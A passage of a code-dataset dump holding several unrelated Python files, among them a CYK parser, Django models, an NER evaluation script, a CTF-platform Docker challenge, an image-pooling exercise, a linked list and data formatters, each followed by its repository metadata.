pass\r\n \r\n if len(table[0][n-1]) != 0 and source in table[0][n-1] :\r\n print(\"True\")\r\n else:\r\n print(\"False\")\r\n \r\n \r\n for i in range(1,n):\r\n table[i] = sorted(table[i],reverse = True)\r\n \r\n result = []\r\n for i in range(0,n):\r\n l = []\r\n for j in range(0,n):\r\n l.append(list(table[j][i]))\r\n result.append(l)\r\n \r\n headers = (list(inputString))\r\n print('')\r\n print(tabulate(result,headers,tablefmt = \"orgtbl\"))\r\n print('')\r\n \r\n \r\ndef main():\r\n \r\n fh = FileHandler()\r\n cyk = CYK()\r\n FilePath = input('Enter the automata file path: ')\r\n lines = fh.readFile(FilePath)\r\n \r\n inputString = input('Enter input String: ')\r\n inputString = inputString.rstrip()\r\n \r\n parsedLines = fh.parseFile(lines)\r\n print('Productions List:')\r\n for production in parsedLines['productions']:\r\n print('\\t', production)\r\n #time.sleep(2)\r\n print('Details loaded')\r\n cyk.isRecognised(inputString, parsedLines)\r\n \r\n\r\nif __name__ == '__main__':\r\n main()\r\n ","repo_name":"Dang-Dinh-NGUYEN/LangagesFormels","sub_path":"TP2.py","file_name":"TP2.py","file_ext":"py","file_size_in_byte":3655,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"29205436190","text":"from django.db import models\r\nfrom mptt.fields import TreeForeignKey\r\nfrom mptt.models import MPTTModel\r\n\r\n\r\nclass TransactionType(models.Model):\r\n name = models.CharField(max_length=50, unique=True)\r\n slug = models.CharField(max_length=20, unique=True)\r\n created_on = models.DateTimeField(auto_now_add=True)\r\n\r\n def __str__(self):\r\n return self.name\r\n\r\n class Meta:\r\n verbose_name_plural = \"Transaction Types\"\r\n\r\n\r\nclass Transaction(MPTTModel):\r\n transaction_id = models.IntegerField(primary_key=True)\r\n type = models.ForeignKey(TransactionType, on_delete=models.CASCADE)\r\n parent = TreeForeignKey('self', null=True, blank=True, related_name='children', db_index=True,\r\n on_delete=models.SET_NULL)\r\n amount = models.FloatField(max_length=50, default=0)\r\n created_on = models.DateTimeField(auto_now_add=True)\r\n\r\n def __str__(self):\r\n return \"{} {} {}\".format(self.transaction_id, self.type, self.amount)\r\n\r\n def get_parent_id(self):\r\n if self.parent:\r\n return self.parent.transaction_id\r\n else:\r\n return None\r\n","repo_name":"jayaswalayush/PocketAce","sub_path":"transaction/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1130,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"6643456658","text":"from storm_client_invenio import InvenioRDM\nfrom storm_client_invenio.models.record import Record, RecordDraft\n\n#\n# 1. Create a InvenioRDM Client instance.\n#\nservice = InvenioRDM(\n \"https://invenio-instance/api\",\n \"\",\n)\n\n#\n# 2. Create a Record Draft\n#\n\n#\n# 2.1 Create draft object\n#\nrecord_draft = RecordDraft(\n dict(\n metadata=dict(\n title=\"Example draft\",\n description=\"Example draft description\",\n contributors=[\n dict(\n person_or_org=dict(\n family_name=\"Some\",\n given_name=\"Person\",\n name=\"Some, Person\",\n type=\"personal\",\n ),\n role=dict(id=\"other\", title=dict(en=\"Other\")),\n )\n ],\n creators=[\n dict(\n person_or_org=dict(\n family_name=\"Some\",\n given_name=\"Person\",\n name=\"Some, Person\",\n type=\"personal\",\n )\n )\n ],\n publisher=\"InvenioRDM Client\",\n resource_type=dict(id=\"software\", title=dict(en=\"Software\")),\n rights=[\n dict(\n id=\"cc-by-4.0\",\n )\n ],\n dates=dict(\n date=\"2020-05-05\", type=dict(id=\"issued\", title=dict(en=\"Issued\"))\n ),\n publication_date=\"2021-12-08\",\n )\n )\n)\n\n#\n# 2.1 Create draft record in the REST API\n#\ncreated_draft = service.records.draft().create(record_draft)\nprint(created_draft)\n\n#\n# 2.2 Draft files\n#\nupdated_draft = service.records.files(created_draft).upload_files(\n {\n \"alice.txt\": \"data/alice.txt\",\n \"creative-commons.png\": \"data/creative-commons.png\",\n },\n commit=True,\n)\n\n#\n# 3. Publish the record draft\n#\nrecord = service.records.draft().publish(updated_draft)\nprint(record)\n\n\n#\n# 4. Search Draft and Records\n#\nprint(service.records.search().query(q=\"is_published: true\"))\n\n# Search only for user specific records\nuser_records = service.records.search(user_records=True).query()\nfor record in user_records:\n if type(record) == Record:\n print(\"Record\")\n print(type(record))\n print(record.links.draft)\n\n elif type(record) == RecordDraft:\n print(\"Record Draft\")\n print(type(record))\n print(record.links.draft)\n","repo_name":"storm-platform/storm-client-invenio","sub_path":"examples/record-deposit.py","file_name":"record-deposit.py","file_ext":"py","file_size_in_byte":2488,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"34991190448","text":"#!/usr/bin/env python\n# coding: utf-8\n# pylint: disable=unused-argument, too-many-arguments, too-many-locals\n\"\"\"\nSmall script for generating hdf5 test files, including FG, G\n\"\"\"\nimport argparse\nimport logging\nimport os\nimport sys\n\nimport h5py\nimport numpy\nfrom distributed import Lock\n\nfrom .dask_wrapper import dask_wrapper, set_up_dask, tear_down_dask\nfrom .fourier_transform import make_subgrid_from_sources\n\nlog = logging.getLogger(\"fourier-data-generater-logger\")\nlog.setLevel(logging.INFO)\nlog.addHandler(logging.StreamHandler(sys.stdout))\n\n\n@dask_wrapper\ndef direct_ft_chunk_work(\n G_2_path, chunk_slice, sources, chunksize, N, use_dask=False, **kwargs\n):\n \"\"\"\n Calculate the value of a chunk of direct fourier transform and\n write to hdf5\n\n :param G_2_path: the hdf5 file path of G\n :param chunk_slice: slice of hdf5 chunk\n :param sources: sources array\n :param chunksize: size of chunk\n :param N: whole data size\n\n \"\"\"\n\n offs = [s.start - N // 2 + chunksize // 2 for s in chunk_slice]\n chunk_G = make_subgrid_from_sources(sources, N, chunksize, offs)\n\n # lock\n if use_dask:\n lock = Lock(G_2_path)\n lock.acquire()\n\n with h5py.File(G_2_path, \"r+\") as f:\n dataset = f[\"G_data\"]\n dataset[chunk_slice[0], chunk_slice[1]] = chunk_G / (N * N)\n\n if use_dask:\n lock.release()\n\n\ndef generate_data_hdf5(\n npixel, G_2_path, FG_2_path, chunksize_G, chunksize_FG, client=None\n):\n \"\"\"\n Generate standard data G and FG with hdf5\n\n :param sparse_ft_class: StreamingDistributedFFT class object\n :param G_2_path: the hdf5 file path of G\n :param FG_2_path: the hdf5 file path of FG\n :param chunksize: size of chunk\n :param client: dask client\n\n :returns: G_2_path, FG_2_path\n \"\"\"\n\n if not os.path.exists(FG_2_path):\n source_count = 10\n sources = numpy.array(\n [\n (\n numpy.random.rand()\n * npixel\n * npixel\n / numpy.sqrt(source_count)\n / 2,\n numpy.random.randint(-npixel // 2, npixel // 2 - 1),\n numpy.random.randint(-npixel // 2, npixel // 2 - 1),\n )\n for _ in range(source_count)\n ]\n )\n f = h5py.File(FG_2_path, \"w\")\n FG_dataset = f.create_dataset(\n \"FG_data\",\n (npixel, npixel),\n dtype=\"complex128\",\n chunks=(chunksize_FG, chunksize_FG),\n )\n # write data point by point\n for i, y, x in sources:\n FG_dataset[int(y) + npixel // 2, int(x) + npixel // 2] += (\n i / npixel / npixel\n )\n f.close()\n\n if client is None:\n use_dask = False\n else:\n use_dask = True\n if not os.path.exists(G_2_path):\n # create a empty hdf5 file\n f = h5py.File(G_2_path, \"w\")\n G_dataset = f.create_dataset(\n \"G_data\",\n (npixel, npixel),\n dtype=\"complex128\",\n chunks=(chunksize_G, chunksize_G),\n )\n chunk_list = []\n for chunk_slice in G_dataset.iter_chunks():\n chunk_list.append(\n direct_ft_chunk_work(\n G_2_path,\n chunk_slice,\n sources,\n chunksize_G,\n npixel,\n use_dask=use_dask,\n nout=1,\n )\n )\n f.close()\n\n if use_dask:\n chunk_list = client.compute(chunk_list, sync=True)\n\n return G_2_path, FG_2_path\n\n\ndef cli_parser():\n \"\"\"\n Parse command line arguments\n\n :return: argparse\n \"\"\"\n parser = argparse.ArgumentParser(\n description=\"generate G and FG hdf5 file for test\",\n fromfile_prefix_chars=\"@\",\n )\n\n parser.add_argument(\n \"--N\", type=int, default=1024, help=\"hdf5 chunksize for G\"\n )\n\n parser.add_argument(\n \"--hdf5_chunksize_G\",\n type=int,\n default=256,\n help=\"hdf5 chunksize for G\",\n )\n\n parser.add_argument(\n \"--hdf5_chunksize_FG\",\n type=int,\n default=256,\n help=\"hdf5 chunksize for FG\",\n )\n\n parser.add_argument(\n \"--hdf5_prefix\", type=str, default=\"./\", help=\"hdf5 path prefix\"\n )\n\n return parser\n\n\ndef main(args):\n \"\"\"\n Main function to generate G and FG hdf5 file\n\n The hdf5 file naming follows the format of G/FG_N_chunksize.h5\n \"\"\"\n\n # Fixing seed of numpy random\n numpy.random.seed(123456789)\n\n scheduler = os.environ.get(\"DASK_SCHEDULER\", None)\n log.info(\"Scheduler: %s\", scheduler)\n\n dask_client = set_up_dask(scheduler_address=scheduler)\n generate_data_hdf5(\n npixel=args.N,\n G_2_path=f\"{args.hdf5_prefix}/\\\n G_{args.N}_{args.hdf5_chunksize_G}.h5\",\n FG_2_path=f\"{args.hdf5_prefix}/\\\n FG_{args.N}_{args.hdf5_chunksize_FG}.h5\",\n chunksize_G=args.hdf5_chunksize_G,\n chunksize_FG=args.hdf5_chunksize_FG,\n client=dask_client,\n )\n tear_down_dask(dask_client)\n\n\nif __name__ == \"__main__\":\n parser_args = cli_parser().parse_args()\n main(parser_args)\n","repo_name":"ska-telescope/ska-sdp-distributed-fourier-transform","sub_path":"src/ska_sdp_exec_swiftly/generate_hdf5.py","file_name":"generate_hdf5.py","file_ext":"py","file_size_in_byte":5238,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"37932888331","text":"'''\nCOMP700 TEXT AND VISION INTELLIGENCE\nASSIGNMENT 1 - NAMED ENTITY RECOGNITION (NER)\nKelly Luo (17985065)\n'''\n\nfrom numpy import *\nimport nltk\nimport os\n\n# Variables for True Positive and False Positive for ORGANIZATION label\nO_TP = 0\nO_FP = 0\nOP_FP = 0\nOL_FP = 0\n\n# Variables for True Positive and False Positive for PERSON label\nP_TP = 0\nP_FP = 0\nPO_FP = 0\nPL_FP = 0\n\n# Variables for True Positive and False Positive for LOCATION label\nL_TP = 0\nL_FP = 0\nLO_FP = 0\nLP_FP = 0\n\nTP = 0\nFN = 0\nFP = 0\ndat_array = []\nresults_array = []\n\n\n# Method that analyses the article text and chunk with category labels and adds into an array for the results\ndef chunk_label_data(txt_writing):\n for sent in nltk.sent_tokenize(txt_writing): # for all the words in the text article\n for chunk in nltk.ne_chunk(nltk.pos_tag(nltk.word_tokenize(sent))): # for all the connected chunks\n if hasattr(chunk, 'label'):\n if chunk.label() == 'GPE': # changing label to be LOCATION if it is GPE\n resultLabel = ' '.join(c[0] for c in chunk), \"LOCATION\"\n results_array.append(resultLabel)\n else:\n resultLabel = ' '.join(c[0] for c in chunk), chunk.label()\n results_array.append(resultLabel)\n\n\n# Method that compares the NER evaluation between each match between the labelled results array (predicted)\n# with the dat file (actual)\ndef ner_evaluation_and_comparison():\n global TP, FP, FN\n datLineCount = 0\n for entry in results_array:\n try:\n dat_array[datLineCount]\n except IndexError: # There are no more lines in the dat file\n FP += 1\n continue\n\n # Case 1: Both Predicted and Actual text are the same\n if entry[0].lower() == dat_array[datLineCount][0].lower():\n\n # Case 1.1: Both Predicted and Actual text are the same BUT Labels are the same\n if entry[1] == dat_array[datLineCount][1] or len(entry[1]) == len(dat_array[datLineCount][1]):\n correct_label_matrix_count(entry[1])\n TP += 1\n datLineCount += 1\n\n # Case 1.2: Both Predicted and Actual text are the same BUT Labels are different\n else:\n wrong_label_matrix_count(((dat_array[datLineCount][1])[:1]).capitalize(), entry[1][:1])\n FP += 1\n datLineCount += 1\n\n # Case 2: Predicted text is missing a word from the Actual text\n elif entry[0].lower() in dat_array[datLineCount][0].lower() and len(entry[0]) < len(dat_array[datLineCount][0]):\n FP += 1\n datLineCount += 1\n\n # Case 3: Predicted text has an extra word compared to the Actual text\n elif dat_array[datLineCount][0].lower() in entry[0].lower() and len(entry[0]) > len(dat_array[datLineCount][0]):\n FP += 1\n datLineCount += 1\n\n # Case 4: The current comparison between predicted text and actual test is not a match\n else:\n for x in range(0,3): # Loop for the next following 3 lines to see if there is a match in text\n if (datLineCount + x + 1) > len(dat_array): # Stop the loop if there is no more lines\n FP += 1\n break\n\n # Case 4.1: Both Predicted and Actual text are the same\n if entry[0].lower() == dat_array[datLineCount + x][0].lower():\n\n # Case 4.2: Both Predicted and Actual text are the same BUT Labels are the same\n if entry[1] == dat_array[datLineCount + x][1] or len(entry[1]) == len(dat_array[datLineCount + x][1]):\n correct_label_matrix_count(entry[1])\n TP += 1\n datLineCount = datLineCount + x + 1\n\n # Case 5: When lines in dat file is skipped, this mean NER was not identified\n if x > 0:\n FN += x\n break\n\n # Case 4.3: Both Predicted and Actual text are the same BUT Labels are different\n else:\n wrong_label_matrix_count(((dat_array[datLineCount][1])[:1]).capitalize(), entry[1][:1])\n FP += 1\n datLineCount = datLineCount + x + 1\n\n # Case 5: When lines in actual values is skipped, this means that NER did not identify\n if x > 0:\n FN += x\n break\n\n # Case 6: There are no matches in the following 3 lines in actual values therefore aditional identification\n if x == 4:\n FP += 1\n\n\n# Method to count the correct category labels\ndef correct_label_matrix_count(results_label):\n global O_TP, P_TP, L_TP\n\n if results_label == 'ORGANIZATION':\n O_TP += 1\n elif results_label == 'PERSON':\n P_TP += 1\n elif results_label == 'LOCATION':\n L_TP += 1\n\n\n# Method to count the incorrect category labels\ndef wrong_label_matrix_count(actual_label, pred_label):\n global OP_FP, OL_FP, PO_FP, PL_FP, LO_FP, LP_FP\n\n if actual_label == 'O':\n if pred_label == 'P':\n OP_FP += 1\n elif pred_label == 'L' or pred_label == 'G':\n OL_FP += 1\n elif actual_label == 'P':\n if pred_label == 'O':\n PO_FP += 1\n elif pred_label == 'L' or pred_label == 'G':\n PL_FP += 1\n elif actual_label == 'L' or actual_label == 'G':\n if pred_label == 'O':\n LO_FP += 1\n elif pred_label == 'P':\n LP_FP += 1\n\n\n# Method to calculate Recall in percentage\ndef calculate_recall(tp, fn):\n return (tp / (tp + fn))*100\n\n\n# Method to calculate Precision in percentage\ndef calculate_precision(tp, fp):\n return (tp / (tp + fp))*100\n\n\n# Method to calculate F Value in percentage\n# Note: Beta value is 1\ndef calculate_Fvalue(precision, recall):\n return (precision * recall)/(precision + recall)\n\n\n# Method to print overall confusion matrix and category matrix\ndef print_confusion_matrix():\n print(\"\\r\\n------------- Confusion Matrix -------------\")\n confusionMatrix = array([[str(' '), str('Pos'), str('Neg')],\n ['Pos','TP='+ str(TP), 'FP='+ str(FP)],\n ['Pos','FN='+ str(FN), 'N/A']])\n print(confusionMatrix)\n\n print(\"\\r\\n------------- Category Confusion Matrix -------------\")\n confusionMatrix = array([[str(' '), 'O', 'P', 'L'],\n ['O', str(O_TP), str(PO_FP) ,str(LO_FP)],\n ['P', str(OP_FP), str(P_TP) ,str(LP_FP)],\n ['L', str(OL_FP), str(PL_FP) ,str(L_TP)]])\n print(confusionMatrix)\n\n O_FP = OP_FP + OL_FP\n P_FP = PO_FP + PL_FP\n L_FP = LO_FP + LP_FP\n print(\"\\r\\nCategory Totals:\")\n print(\"ORGANISATION ------> TP:\" + str(O_TP) + \" ---- FP:\" + str(O_FP))\n print(\"PERSON ------> TP:\" + str(P_TP) + \" ---- FP:\" + str(P_FP))\n print(\"LOCATION ------> TP:\" + str(L_TP) + \" ---- FP:\" + str(L_FP))\n\n\n# Method to print the overall FPR calculations\ndef print_FPR():\n print(\"\\r\\n------------- FPR Calculations -------------\")\n precision = calculate_precision(TP, FP)\n print(\"Overall Precision (P): \" + str(\"{:.2f}\".format(precision)) + \"%\")\n recall = calculate_recall(TP, FN)\n print(\"Overall Recall (R): \" + str(\"{:.2f}\".format(recall)) + \"%\")\n print(\"Overall F Value (F): \" + str(\"{:.2f}\".format(calculate_Fvalue(precision, recall))) + \"%\")\n\n # print(\"\\r\\nCategory Totals:\")\n # org_prec = calculate_precision(O_TP, O_FP)\n # org_recall = calculate_recall(O_TP, O_FN)\n # print(\"ORGANISATION ------> P:\" + str(org_prec) + \"% ---- R:\" + (str(O_FP)) + \"% ---- F:\" + (str(OP_FP + OL_FP)) + \"%\")\n # print(\"PERSON ------> TP:\" + str(P_TP) + \" ---- FP:\" + (str(PO_FP + PL_FP)))\n # print(\"LOCATION ------> TP:\" + str(L_TP) + \" ---- FP:\" + (str(LO_FP + LP_FP)))\n\n\n# Method to read and filter data from the dat files into an array\ndef read_dat_file(dat_writing):\n # count = 0\n for line in dat_writing:\n if line.strip() == '': # if the line is empty\n # count += 1\n # print(\"---SKIPPED LINE \" + str(count))\n continue\n\n l = line.split('(')\n\n # Remove the empty spaces in start and end, '\\n' and '(' character\n try:\n l[0] = l[0].strip()\n l[1] = l[1].strip()\n l[1] = (l[1])[:-1]\n if 'GPE' in l[1]: # Change GPE to LOCATION when storing into dat_array\n l[1] = 'LOCATION'\n except IndexError: # Ignore the line if missing text or label\n continue\n\n dat_array.append(l)\n # count += 1\n # print(\"LINE \" + str(count) + \" EXTRACTED\")\n\n\n\"\"\" ------------------------------------ CODE EXECUTION BELOW ----------------------------------------- \"\"\"\n\n# Set path to your own path with all the dat and txt files in the same folder\ndatasetPath = 'C:/Users/LuoKe/OneDrive/Documents/EntireDataset/'\nfiles = array(os.listdir(datasetPath))\n\nfileCount = 0;\nwhile True:\n if fileCount >= 554:\n break\n\n # Keeping reference to the current file and the next file\n currentFile = files[fileCount].split('.')\n if fileCount + 1 < 554:\n nextFile = files[fileCount + 1].split('.')\n\n if files[fileCount].endswith('.dat'):\n # Check if the next file is a .txt file with same student ID number\n if currentFile[0] == nextFile[0] and nextFile[1] == 'txt':\n print(\"------ Processing file: \" + currentFile[0] + \" ------ \\r\\n\\r\\n\")\n\n try:\n datFile = open(os.path.join(datasetPath, files[fileCount]), 'r', encoding='UTF8')\n datWriting = datFile.readlines()\n except UnicodeDecodeError:\n datFile = open(os.path.join(datasetPath, files[fileCount]), 'r')\n datWriting = datFile.readlines()\n\n try:\n txtFile = open(os.path.join(datasetPath, files[fileCount + 1]), 'r', encoding='UTF8')\n txtWriting = txtFile.read()\n except UnicodeDecodeError:\n txtFile = open(os.path.join(datasetPath, files[fileCount + 1]), 'r')\n txtWriting = txtFile.read()\n\n read_dat_file(datWriting)\n chunk_label_data(txtWriting)\n ner_evaluation_and_comparison()\n\n dat_array.clear()\n results_array.clear()\n fileCount += 2\n\nprint_confusion_matrix()\nprint_FPR()","repo_name":"kelly-luo/NER-Evaluation","sub_path":"NER-Evaluation.py","file_name":"NER-Evaluation.py","file_ext":"py","file_size_in_byte":10586,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"12148428685","text":"import shlex\nfrom pathlib import Path\n\nfrom aiohttp import web\n\nimport r8.challenge_mixins\n\n\nclass DockerHelloWorld(r8.challenge_mixins.DockerChallenge):\n title = \"Docker Container Example\"\n\n dockerfile = Path(__file__).parent / \"docker-helloworld\"\n\n async def description(self, user: str, solved: bool):\n return r8.util.media(\n None,\n \"\"\"\n
\n \n \n
\n
\n \"\"\"\n + r8.util.challenge_form_js(self.id),\n )\n\n async def handle_post_request(self, user: str, request: web.Request):\n json = await request.json()\n try:\n return await self.docker_run(user, *shlex.split(json.get(\"command\", \"\")))\n except r8.challenge_mixins.DockerError as e:\n raise web.HTTPInternalServerError(reason=str(e))\n","repo_name":"mhils/r8","sub_path":"r8/builtin_challenges/docker.py","file_name":"docker.py","file_ext":"py","file_size_in_byte":1058,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"53"} +{"seq_id":"18983075837","text":"# 정수 1개가 입력되었을 때, 음(minus)/양(plus)/0(zero)과 짝(even)/홀(odd)을 출력해보자.\n\ndef minus_plus(num):\n if num > 0:\n print(\"plus\")\n elif num == 0:\n print(\"zero\")\n else:\n print(\"minus\")\n\ndef even_odd(num):\n if num % 2 == 0:\n print(\"even\")\n else:\n print(\"odd\")\n\ndef init():\n num = int(input())\n\n minus_plus(num)\n even_odd(num)\n\ninit()","repo_name":"kkojae91/algorithm_prac","sub_path":"python_algorithm/codeup100/codeup67.py","file_name":"codeup67.py","file_ext":"py","file_size_in_byte":383,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"6497018507","text":"from src.core.plateau import Plateau\nfrom src.core.rover import Rover\nfrom src.utils.logger import get_logger\n\nlogger = get_logger()\n\n\ndef normalize_input_string(input_str) -> list:\n \"\"\"\n Convert input string letters to uppercase and ensure there are spaces between characters.\n\n Args:\n input_str (str): The original input string.\n\n Returns:\n str: The normalized input string.\n \"\"\"\n input_str = input_str.upper()\n\n formatted_parts = []\n for part in input_str.strip().split(\"\\n\"):\n if len(part) > 1 and not part.isdigit():\n formatted_parts.append(tuple(part.strip().split()))\n else:\n formatted_parts.append(tuple(part.split()))\n return formatted_parts\n\n\ndef split_adjacent_chars(chars):\n \"\"\"\n Split strings with more than one character into individual characters.\n\n Args:\n chars (list of str): List of characters and strings.\n\n Returns:\n list of str: List of individual characters.\n \"\"\"\n result = []\n for char in chars:\n # Extend the result list with individual characters from each string\n result.extend(tuple(char))\n return result\n\n\ndef validate_orientation(orientation):\n \"\"\"\n Validate rover orientation.\n\n Args:\n orientation (str): The rover orientation.\n\n Raises:\n ValueError: If orientation is invalid.\n \"\"\"\n if orientation not in [\"N\", \"E\", \"S\", \"W\"]:\n raise ValueError(f\"Invalid orientation {orientation}\")\n\n\ndef validate_commands(commands):\n \"\"\"\n Validate rover commands.\n\n Args:\n commands (list of str): The rover commands.\n\n Raises:\n ValueError: If any command is invalid.\n \"\"\"\n if any(command not in [\"L\", \"R\", \"M\"] for command in commands):\n raise ValueError(f\"Invalid commands {commands}\")\n\n\ndef process_input(input_str):\n \"\"\"\n Process the input string.\n\n Args:\n input_str (str): The input string.\n\n Returns:\n tuple: A tuple containing the plateau and a list of rovers and their commands.\n \"\"\"\n try:\n lines = normalize_input_string(input_str)\n plateau_width, plateau_height = map(int, lines[0])\n plateau = Plateau(plateau_width, plateau_height)\n rovers_and_commands = []\n\n for i in range(1, len(lines), 2):\n x, y, orientation = split_adjacent_chars(lines[i])\n validate_orientation(orientation)\n x, y = int(x), int(y)\n rover = Rover(x, y, orientation, plateau)\n commands = split_adjacent_chars(lines[i + 1])\n validate_commands(commands)\n rovers_and_commands.append((rover, commands))\n\n return rovers_and_commands\n except ValueError as ve:\n print(f\"Invalid input: {ve}\")\n logger.exception(f\"Invalid input: {ve}\")\n raise\n","repo_name":"NicolaGernone/Test-Rover","sub_path":"src/processes/process_input.py","file_name":"process_input.py","file_ext":"py","file_size_in_byte":2813,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"39483086909","text":"import re\n\nimport cv2\nimport os\nimport numpy as np\nfrom PIL import Image\n\nid = 1\ncount = 10\ndirPath = \"\"\nlistFiles = []\n\nfor (dirPath, dirnames, filenames) in os.walk(\n # \"C:/Users/Ichanskiy/PycharmProjects/FaceIdWebCam/FacialRecognition/input/\"):\n \"D:/Diplom/testing/input/\"):\n listFiles = filenames\n print(list)\n print(dirPath)\n print(dirnames)\n break\n\nface_detector = cv2.CascadeClassifier('haarcascade_frontalface_default.xml')\n\nlistFiles.sort(reverse=True)\nfor fileName in listFiles:\n im = Image.open(dirPath + fileName)\n idImage = fileName.replace(\".jpg\", \"\")\n idImage = re.findall(\"\\d+\", idImage)[0]\n im2arr = np.array(im)\n\n img = cv2.flip(im2arr, 1) # flip video image vertically\n gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n faces = face_detector.detectMultiScale(gray, 1.3, 5)\n\n for i in range(1, count):\n for (x, y, w, h) in faces:\n cv2.rectangle(img, (x, y), (x + w, y + h), (255, 0, 0), 2)\n # Save the captured image into the datasets folder\n # cv2.imwrite(\"C:/Users/Ichanskiy/PycharmProjects/FaceIdWebCam/FacialRecognition/dataset/\" + str(\n cv2.imwrite(\"D:/Diplom/testing/dataset/\" + str(\n idImage) + '.' + str(i) + \".jpg\", gray[y:y + h, x:x + w])\n # count += 1\n id = id + 1\n","repo_name":"Ichanskiy/FaceIdWebCam","sub_path":"FacialRecognition/01_face_dataset.py","file_name":"01_face_dataset.py","file_ext":"py","file_size_in_byte":1324,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"14816107023","text":"import cv2\nimport numpy as np\n\ndef AveragePooling(_img):\n img = _img.copy()\n result = np.zeros_like(img)\n for i in range(img.shape[0]//8):\n ind_11 = i * 8\n ind_12 = ind_11 + 8\n for j in range(img.shape[1]//8):\n ind_21 = j * 8\n ind_22 = ind_21 + 8\n result[ind_11:ind_12, ind_21:ind_22, 0] = np.mean(img[ind_11:ind_12, ind_21:ind_22, 0])\n result[ind_11:ind_12, ind_21:ind_22, 1] = np.mean(img[ind_11:ind_12, ind_21:ind_22, 1])\n result[ind_11:ind_12, ind_21:ind_22, 2] = np.mean(img[ind_11:ind_12, ind_21:ind_22, 2])\n\n return result\n\nimg = cv2.imread(\"imori.jpg\")\n\nresult = AveragePooling(img)\ncv2.imwrite(\"myans_07.jpg\", result)\n","repo_name":"OverHall27/Gasyori100knock","sub_path":"Question_01_10/myans/myans_07.py","file_name":"myans_07.py","file_ext":"py","file_size_in_byte":715,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"37299207823","text":"class LinkedList:\n '''Linked-List of nodes of primative data types'''\n def __init__(self, head=None):\n self.head = head\n \n def getHead(self):\n return self.head\n\n # Big O(1) - Inserts new Node at index(0) and shifts data down\n def insert(self, data):\n '''Inserts data node at the beginning of the linked-list'''\n new_node = Node(data)\n new_node.next = self.head\n self.head = new_node\n\n # Big O(n) - Must goes to nth elem to add to end\n def push(self, data):\n ''' \\'Pushes\\' data to the end of the linked list'''\n new_node = Node(data)\n if(self.head == None):\n self.head = new_node\n else:\n curr = self.head\n while(curr.next is not None):\n curr = curr.next\n curr.next = new_node\n \n # Big O(n) - Must go to (n-1)th elem\n def pop(self):\n '''Removes data node at the end of the linked-list'''\n if self.head == None:\n print(\"Linked-List is empty!!!\")\n elif self.head.next == None:\n self.head = None\n else:\n prev = self.head\n curr = self.head.next\n while(curr.next is not None):\n prev = curr\n curr = curr.next\n prev.next = None\n\n # Big O(n) - Worst case is last elem n\n def get(self, index):\n '''Gets data element at index'''\n curr = self.head\n for i in range(1, index):\n curr = curr.next\n return curr.data\n\n # Big (O)n\n def reverse(self):\n prev = None\n curr = self.head\n while(curr is not None):\n next_node = curr.next\n curr.next = prev\n prev = curr\n curr = next_node\n self.head = prev\n\n \n\n \n def __str__(self):\n string = \"LinkedList: [\"\n if self.head is not None:\n string+=f\"{self.head.data}\"\n curr = self.head.next\n while(curr is not None):\n string+=f\",{curr.data}\"\n curr = curr.next\n string+=\"]\"\n return string\n\nclass Node:\n def __init__(self, data=None, next=None):\n self.data = data\n self.next = next\n def getData(self):\n return self.data","repo_name":"jaredivory/COM250","sub_path":"python/data_structures_module/LinkedList.py","file_name":"LinkedList.py","file_ext":"py","file_size_in_byte":2280,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"14831682123","text":"from geotagx_validator.helper import check_arg_type\nimport geotagx_validator.project as validator\n\ndef format_project_configuration(configuration, validate_configuration=True):\n \"\"\"Formats the specified project configuration.\n\n Args:\n configuration (dict): A project configuration to format.\n validate_configuration (bool): If set to True, the specified configuration\n will be validated before it's processed.\n\n Returns:\n dict: The formatted project configuration.\n\n Raises:\n TypeError: If the configuration argument is not a dictionary, or\n validate_configuration is not a boolean.\n ValueError: If the specified configuration is not a valid project configuration.\n \"\"\"\n check_arg_type(format_project_configuration, \"configuration\", configuration, dict)\n check_arg_type(format_project_configuration, \"validate_configuration\", validate_configuration, bool)\n\n if validate_configuration:\n valid, message = validator.is_project_configuration(configuration)\n if not valid:\n raise ValueError(message)\n\n formatters = {\n \"name\": format_project_name,\n \"description\": format_project_description,\n \"repository\": format_project_repository,\n }\n for key in configuration:\n formatter = formatters.get(key)\n if formatter:\n configuration[key] = formatter(configuration[key], False)\n\n return configuration\n\n\ndef format_project_name(name, validate_name=True):\n \"\"\"Formats the specified project name.\n\n Formatting a project name will simply remove any leading and trailing whitespace.\n\n Args:\n name (str): A project name to format.\n validate_name (bool): If set to True, the specified project name will be\n validated before it's processed.\n\n Returns:\n basestring: The formatted project name.\n\n Raises:\n TypeError: If the name argument is not a basestring instance, or\n validate_name is not a boolean.\n ValueError: If the specified name is not valid.\n \"\"\"\n check_arg_type(format_project_name, \"name\", name, basestring)\n check_arg_type(format_project_name, \"validate_name\", validate_name, bool)\n\n if validate_name:\n valid, message = validator.is_project_name(name)\n if not valid:\n raise ValueError(message)\n\n return name.strip()\n\n\ndef format_project_description(description, validate_description=True):\n \"\"\"Formats the specified project description.\n\n Formatting a project description will simply remove any leading and trailing\n whitespace.\n\n Args:\n description (str): A project description to format.\n validate_description (bool): If set to True, the specified project\n description will be validated before it's processed.\n\n Returns:\n basestring: The formatted project description.\n\n Raises:\n TypeError: If the description argument is not a basestring instance, or\n validate_description is not a boolean.\n ValueError: If the specified description is not valid.\n \"\"\"\n check_arg_type(format_project_description, \"description\", description, basestring)\n check_arg_type(format_project_description, \"validate_description\", validate_description, bool)\n\n if validate_description:\n valid, message = validator.is_project_description(description)\n if not valid:\n raise ValueError(message)\n\n return description.strip()\n\n\ndef format_project_repository(repository, 